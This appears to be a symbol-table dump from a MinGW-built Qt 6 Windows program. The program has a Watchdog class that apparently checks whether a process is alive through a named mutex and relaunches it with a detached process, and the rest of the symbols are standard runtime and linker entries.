.xdata$_ZN9QtPrivate15QCallableObjectIM8WatchdogFvvENS_4ListIJEEEvE4implEiPNS_15QSlotObjectBaseEP7QObjectPPvPb
.pdata$_ZN9QtPrivate15QCallableObjectIM8WatchdogFvvENS_4ListIJEEEvE4implEiPNS_15QSlotObjectBaseEP7QObjectPPvPb
.xdata$_ZN17QArrayDataPointerI7QStringED1Ev
.pdata$_ZN17QArrayDataPointerI7QStringED1Ev
_Z19registerAliveHandleRK7QString
_ZZ19registerAliveHandleRK7QStringE8s_handle
_Z14isProcessAliveRK7QString
processcheck_win.cpp
__do_global_dtors
__do_global_ctors
.rdata$.refptr.__CTOR_LIST__
initialized
__dyn_tls_dtor
__dyn_tls_init
.rdata$.refptr._CRT_MT
__tlregdtor
__report_error
mark_section_writable
maxSections
_pei386_runtime_relocator
was_init.0
.rdata$.refptr.__RUNTIME_PSEUDO_RELOC_LIST_END__
.rdata$.refptr.__RUNTIME_PSEUDO_RELOC_LIST__
__mingw_raise_matherr
stUserMathErr
__mingw_setusermatherr
_gnu_exception_handler
__mingwthr_run_key_dtors.part.0
__mingwthr_cs
key_dtor_list
___w64_mingwthr_add_key_dtor
__mingwthr_cs_init
___w64_mingwthr_remove_key_dtor
__mingw_TLScallback
pseudo-reloc-list.c
_ValidateImageBase
_FindPESection
_FindPESectionByName
__mingw_GetSectionForAddress
__mingw_GetSectionCount
_FindPESectionExec
_GetPEImageBase
_IsNonwritableInCurrentImage
__mingw_enum_import_library_names
.debug_info
.debug_abbrev
.debug_line
.debug_line_str
.debug_aranges
.debug_str
.debug_frame
__p__fmode
.rdata$.refptr.__imp__fmode
__p__commode
.rdata$.refptr.__imp__commode
mingw_get_invalid_parameter_handler
_get_invalid_parameter_handler
mingw_set_invalid_parameter_handler
_set_invalid_parameter_handler
invalid_parameter_handler.c
__acrt_iob_func
register_frame_ctor
.ctors.65535
.rdata_runtime_pseudo_reloc
___RUNTIME_PSEUDO_RELOC_LIST__
_ZN6QTimerD1Ev
__imp_abort
__lib64_libkernel32_a_iname
_ZN16QCoreApplicationD1Ev
__data_start__
___DTOR_LIST__
__imp__fmode
__imp__ZN7QString8fromUtf8E14QByteArrayView
_ZN4QDir18toNativeSeparatorsERK7QString
SetUnhandledExceptionFilter
_ZN7QObject11qt_metacastEPKc
_head_lib64_libmsvcrt_def_a
.refptr.__mingw_initltsdrot_force
__imp_calloc
__imp__ZN16QCoreApplicationC1ERiPPci
__imp___p__fmode
_ZN16QCoreApplicationC1ERiPPci
_ZN7QString6appendE20QBasicUtf8StringViewILb0EE
__imp__ZN4QDirD1Ev
___tls_start__
__imp__ZN6QTimer5startEv
.refptr.__native_startup_state
__imp__ZN7QObject11qt_metacastEPKc
_ZN8QProcess13startDetachedERK7QStringRK5QListIS0_ES2_Px
GetLastError
__rt_psrelocs_start
__dll_characteristics__
__size_of_stack_commit__
__mingw_module_is_dll
__iob_func
__size_of_stack_reserve__
__major_subsystem_version__
___crt_xl_start__
__imp__ZN8QVariantC1ERK7QString
__imp_DeleteCriticalSection
__imp__set_invalid_parameter_handler
.refptr.__CTOR_LIST__
VirtualQuery
___crt_xi_start__
.refptr.__imp__fmode
_ZN4QDirC1ERK7QString
__imp__amsg_exit
___crt_xi_end__
.refptr.__imp___initenv
_tls_start
_ZN7QObjectD2Ev
_ZN9QtPrivate25QMetaTypeInterfaceWrapperI8WatchdogE8metaTypeE
_ZTS7QObject
_ZN7QObject11eventFilterEPS_P6QEvent
__imp__ZN6QTimerC1EP7QObject
__imp__ZN16QCoreApplication4execEv
_ZN7QObjectC2EPS_
.refptr._matherr
.refptr.__RUNTIME_PSEUDO_RELOC_LIST__
__mingw_oldexcpt_handler
__imp__ZNK7QString5utf16Ev
TlsGetValue
_ZN7QObject16disconnectNotifyERK11QMetaMethod
__nm__ZN7QObject16staticMetaObjectE
__imp__ZTVN10__cxxabiv117__class_type_infoE
__imp_strcmp
_head_libstdc___6_dll
__bss_start__
__imp___C_specific_handler
___RUNTIME_PSEUDO_RELOC_LIST_END__
_ZN6QTimer5startEv
__imp__ZNK4QDir8filePathERK7QString
__size_of_heap_commit__
__imp_GetLastError
_ZNK11QObjectData17dynamicMetaObjectEv
.refptr._dowildcard
__mingw_initltsdrot_force
__imp__ZN4QDirC1ERK7QString
__imp_free
__imp__ZN7QObject10childEventEP11QChildEvent
_ZN6QTimer11setIntervalEi
_ZN9QSettingsD1Ev
.refptr.__mingw_app_type
__mingw_initltssuo_force
__imp__ZN7QObject5eventEP6QEvent
__imp__ZN7QObject11connectImplEPKS_PPvS1_S3_PN9QtPrivate15QSlotObjectBaseEN2Qt14ConnectionTypeEPKiPK11QMetaObject
VirtualProtect
___crt_xp_start__
__imp__ZTVN10__cxxabiv120__si_class_type_infoE
__imp_LeaveCriticalSection
__imp__ZN16QCoreApplication18applicationDirPathEv
__C_specific_handler
.refptr.__mingw_oldexcpt_handler
.refptr.__RUNTIME_PSEUDO_RELOC_LIST_END__
___crt_xp_end__
__imp__ZN6QTimer7timeoutENS_14QPrivateSignalE
__imp_CloseHandle
__minor_os_version__
_ZN7QObject10childEventEP11QChildEvent
EnterCriticalSection
_MINGW_INSTALL_DEBUG_MATHERR
_ZTV8Watchdog
.refptr.__xi_a
.refptr._CRT_MT
__imp_qt_version_tag_6_11
__imp__ZdlPvy
__section_alignment__
__native_dllmain_reason
_ZN9QSettings8setValueE14QAnyStringViewRK8QVariant
_tls_used
__IAT_end__
__imp_memcpy
__RUNTIME_PSEUDO_RELOC_LIST__
__lib64_libmsvcrt_def_a_iname
_ZN16QCoreApplication18setApplicationNameERK7QString
__imp__ZN7QObject10timerEventEP11QTimerEvent
__imp__ZN6QTimerD1Ev
.refptr._newmode
__imp__ZN7QObject13connectNotifyERK11QMetaMethod
_ZN11QMetaObject10ConnectionD1Ev
_Unwind_Resume
__imp_OpenMutexW
__data_end__
__imp_fwrite
qt_version_tag_6_11
__imp__Unwind_Resume
__CTOR_LIST__
__nm__ZN6QTimer16staticMetaObjectE
__imp___getmainargs
_head_lib64_libkernel32_a
libstdc___6_dll_iname
__bss_end__
__native_vcclrit_reason
___crt_xc_end__
.refptr.__mingw_initltssuo_force
__imp__ZN7QObjectC2EPS_
.refptr.__native_startup_lock
Qt6Core_dll_iname
__imp___gxx_personality_seh0
__imp_EnterCriticalSection
__imp__ZN16QCoreApplication19setOrganizationNameERK7QString
_tls_index
__native_startup_state
___crt_xc_start__
_ZN16QCoreApplication19applicationFilePathEv
__imp__ZN9QSettingsC1ERK7QStringNS_6FormatEP7QObject
__imp__ZNK11QObjectData17dynamicMetaObjectEv
libgcc_s_seh_1_dll_iname
qt_version_tag_6_11_used
___CTOR_LIST__
.refptr.__dyn_tls_init_callback
__imp_signal
CreateMutexW
__imp__ZN16QCoreApplicationD1Ev
.refptr.__mingw_initltsdyn_force
__rt_psrelocs_size
__imp_strlen
__imp_malloc
.refptr._gnu_exception_handler
_ZN7QObject11connectImplEPKS_PPvS1_S3_PN9QtPrivate15QSlotObjectBaseEN2Qt14ConnectionTypeEPKiPK11QMetaObject
__imp__ZN7QObjectD2Ev
__file_alignment__
__imp_InitializeCriticalSection
_ZTS8Watchdog
CloseHandle
__getmainargs
_ZN7QObject11customEventEP6QEvent
_ZN16QCoreApplication4execEv
InitializeCriticalSection
__imp_exit
_ZN16QCoreApplication18applicationDirPathEv
__imp_vfprintf
__major_os_version__
__mingw_pcinit
__nm__ZTVN10__cxxabiv120__si_class_type_infoE
_head_libgcc_s_seh_1_dll
__imp___initenv
_ZN7QObject5eventEP6QEvent
__IAT_start__
_ZN9QtPrivate16QMetaTypeForTypeI8WatchdogE4nameE
__imp__cexit
__imp_SetUnhandledExceptionFilter
_ZTI8Watchdog
__imp__ZN16QCoreApplication18setApplicationNameERK7QString
_ZN6QTimer7timeoutENS_14QPrivateSignalE
__imp__ZN6QTimer16staticMetaObjectE
__imp__onexit
__imp__ZN7QObject11eventFilterEPS_P6QEvent
__imp__ZN8QProcess13startDetachedERK7QStringRK5QListIS0_ES2_Px
__DTOR_LIST__
__imp__ZN7QObject16staticMetaObjectE
__set_app_type
__imp_Sleep
LeaveCriticalSection
__imp___setusermatherr
_ZN8QVariantD1Ev
__imp__ZN4QDir18toNativeSeparatorsERK7QString
__size_of_heap_reserve__
___crt_xt_start__
__imp__ZN9QSettingsD1Ev
__subsystem__
_amsg_exit
__imp_TlsGetValue
_ZN7QObject10timerEventEP11QTimerEvent
_ZNK7QString5utf16Ev
_ZN4QDirD1Ev
__setusermatherr
.refptr._commode
__imp_fprintf
__mingw_pcppinit
__imp__ZN9QSettings8setValueE14QAnyStringViewRK8QVariant
__imp___p__commode
__imp__ZN7QString6appendERKS_
__imp_VirtualProtect
_ZN9QSettingsC1ERK7QStringNS_6FormatEP7QObject
__imp_CreateMutexW
_ZN10QArrayData10deallocateEPS_xx
_ZN8Watchdog16staticMetaObjectE
_ZN16QCoreApplication19setOrganizationNameERK7QString
___tls_end__
__imp_VirtualQuery
__imp__initterm
__mingw_initltsdyn_force
_dowildcard
__imp___iob_func
_ZN8QVariantC1ERK7QString
__dyn_tls_init_callback
.refptr.__image_base__
_initterm
__imp_strncmp
__fu1__ZTVN10__cxxabiv120__si_class_type_infoE
.refptr._fmode
__imp___acrt_iob_func
__major_image_version__
__loader_flags__
__imp__ZN11QMetaObject10ConnectionD1Ev
.refptr.__imp__commode
__imp__ZN7QObject16disconnectNotifyERK11QMetaMethod
___chkstk_ms
__native_startup_lock
__fu0__ZTVN10__cxxabiv117__class_type_infoE
__rt_psrelocs_end
__imp__get_invalid_parameter_handler
__imp__ZN10QArrayData10deallocateEPS_xx
__minor_subsystem_version__
__minor_image_version__
_ZNK4QDir8filePathERK7QString
__imp__ZN7QObject11customEventEP6QEvent
__imp___set_app_type
_ZN7QObject11qt_metacallEN11QMetaObject4CallEiPPv
_ZN7QString8fromUtf8E14QByteArrayView
.refptr._ZTV8Watchdog
.refptr.__xc_a
OpenMutexW
_ZN7QObject13connectNotifyERK11QMetaMethod
.refptr.__xi_z
.refptr._MINGW_INSTALL_DEBUG_MATHERR
__imp__commode
DeleteCriticalSection
__imp__ZN7QObject11qt_metacallEN11QMetaObject4CallEiPPv
_ZN9QFileInfo6existsERK7QString
__RUNTIME_PSEUDO_RELOC_LIST_END__
_ZN7QString6appendERKS_
__imp__ZN16QCoreApplication19applicationFilePathEv
.refptr.__xc_z
___crt_xt_end__
__imp__ZN7QString6appendE20QBasicUtf8StringViewILb0EE
__gxx_personality_seh0
_ZTI7QObject
__imp__ZN6QTimer11setIntervalEi
__imp__ZN8QVariantD1Ev
__imp__ZN9QFileInfo6existsERK7QString
__imp__Znwy
_head_Qt6Core_dll
__nm__ZTVN10__cxxabiv117__class_type_infoE
__mingw_app_type
_ZN6QTimerC1EP7QObject
